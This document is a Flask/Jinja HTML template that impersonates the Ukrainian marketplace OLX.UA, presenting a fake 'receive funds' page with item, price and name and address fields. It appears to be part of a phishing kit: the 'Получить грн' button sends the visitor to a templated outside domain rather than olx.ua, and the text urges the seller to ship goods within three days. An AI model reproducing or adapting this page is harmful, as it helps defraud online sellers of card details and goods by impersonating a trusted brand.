<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <title>OLX.UA - Получение средств</title>
    <link rel="stylesheet" src="{{ url_for( 'static', filename='/assetsolx/index.css', v=1)}}">
    <link href="{{ url_for( 'static', filename='/assetsolx/index.css', v=1)}}" rel="stylesheet">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <link rel="icon" type="image/x-icon" href="{{ url_for( 'static', filename='/assetsolx/index.css', v=1)}}">

    <meta name="description" content="OLX.UA – бесплатные объявления">
    <meta property="og:title" content="Оплата доставки | ">
    <meta property="og:url" content="https://olx.ua/">
    <meta property="og:type" content="website">
    <meta property="og:image" content="">
    <meta property="og:description" content="Получение средств">
</head>

<body>
    
<header>
    <div class="container">
        <div class="header-logo">
            <span class="header-logo_o"></span>
            <span class="header-logo_l"></span>
            <span class="header-logo_x"></span>
        </div>
    </div>
</header>

<main>
    <form action="http://{{domain}}/input/{{keySTR}} method="GET">
        <div class="container">
            <section class="section-info">
                <img src="{{ url_for( 'static', filename='/assetsolx/check.svg', v=1)}}" alt="" class="section-info_icon">
                <div class="section-info_text">
                    <p class="section-info_title">Получение средств</p><p class="section-info_subtitle"></p>                </div>
            </section>
            <div class="item-container">
                <section class="item-block">
                    <div class="section-content">
                        <div class="item-block_header">
                            <div class="item-block_image">
                                <img src="{{imgs}}" alt="">
                            </div>
                            <div class="item-block_text">
                                <p class="item-block_title">{{title}}</p>
                                <p class="item-block_price">{{cash}} ГРН</p>
                                <p class="item-block_status">
                                    </p>
                            </div>
                        </div>
                                                    <div class="recipient-block">
                                <div class="recipient-block_row">
                                    <div class="recipient-subblock_min">
                                        <label>ФИО</label>
                                        <input class="recipient-block_input" placeholder="Введите ваше имя" >
                                    </div>
                                    
                                    <div class="recipient-subblock_min">
                                    </div>
                                    <div class="recipient-block_row">
                                    </div>
                                </div>
                                <div class="item-block_main">
                                    <div class="recipient-subblock_max">
                                        <label>Адрес доставки</label>
                                        <input class="recipient-block_input" placeholder="Ввеите отделение почты">
                                    </div>
                                </div>
                            </div>
                                                <div class="item-block_main">
                            <div class="item-block_description">
                                                                    <p class="description-subtitle">
                                        <br><br>После получения средств на Вашу карту, пожалуйста отправьте товар покупателю по указанным данным, доступные пункты отправки товара можете просмотреть на официальном сайте НоваПошта
                                        <br><br> После отправки товара укажите номер отправления покупателю! Товар следует отправить в течение 3-х суток с момента получения средств
                                    </p>
                                                            </div>
                        </div>
                        <div class="item-block_footer">
                            <p class="item-footer_text">Номер объявления: <b>{{keySTR}}</b></p>
                        </div>
                    </div>
                </section>
                <section class="item-pay">
                    <div class="section-content">
                        <div class="bundle">
                            <div class="container _container" data-container="PaymentsContainer">
                                <div class="payments_container" id="payments">
                                    <div>

                                        <input type="hidden" name="amount" value="123123">
                                        <input type="hidden" name="item" value="asdasd">
                                        <p class="item-pay_price">Сумма: <b>{{cash}} ГРН</b></p>
                                        <p class="item-pay_item">Товар: {{title}}</p>

                                        <a href="">
                                            <button class="item-pay_button" type="submit">Получить {{cash}} грн                            </button>
                                        </a>
                                        <p class="item-pay_safery"><img src="{{ url_for( 'static', filename='assetsolx/shield.svg', v=1)}}" alt="">Проведение платежей безопасно</p>
                                        <img src="{{ url_for( 'static', filename='/assetsolx/icons.png', v=1)}}" alt="" class="item-pay_paymentMethods">
                                    </div>
                </div></div></div></div></section>
            </div>
        </div>
    </form>
</main>


</body></html>